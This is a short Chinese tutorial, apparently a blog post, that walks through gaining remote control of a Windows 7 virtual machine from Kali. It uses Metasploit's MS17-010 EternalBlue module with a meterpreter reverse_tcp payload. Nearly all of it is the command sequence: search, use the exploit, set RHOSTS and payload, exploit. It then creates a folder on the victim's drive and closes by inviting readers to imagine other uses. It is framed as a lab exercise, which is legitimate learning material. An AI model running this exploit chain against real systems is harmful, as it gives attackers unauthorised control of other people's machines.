通过msfconsole获取windows7的控制

msfconsole获取windows7的控制

  • 此处我们使用vmware软件来模拟,两个主机分别为windows7和kali主机,注意两个主机的网络适配器要接到同一个网口,否则ping不通;
  • windows7的ip为10.1.1.1/24,kali的ip为10.1.1.2/24
(1)打开msfconsole;

msfconsole
通过msfconsole获取windows7的控制

(2)搜索漏洞;

search ms17-010
通过msfconsole获取windows7的控制

(1)使用漏洞;

use exploit/windows/smb/ms17_010_eternalblue通过msfconsole获取windows7的控制

(1)显示设置;

show options
通过msfconsole获取windows7的控制
Required选项中为yes的是必填项,其中RHOSTS是目标的ip;

(1)设置相关参数;

set RHOSTS 10.1.1.1
set payloads windows/x64/meterpreter/reverse_tcp
通过msfconsole获取windows7的控制

(1)开始获取目标控制权;

exploit
通过msfconsole获取windows7的控制

(1)成功获取对方控制权;

通过msfconsole获取windows7的控制

  • 此处有乱码,使用指令chcp 65001;

通过msfconsole获取windows7的控制

(1)做一个小小的测试;
  • 在对方的e盘中创建一个文件夹hey;

通过msfconsole获取windows7的控制

  • 查看windows7中的e盘,可以看见已经生成了hey文件夹;
    通过msfconsole获取windows7的控制

有什么其他的用途请自行发挥想象。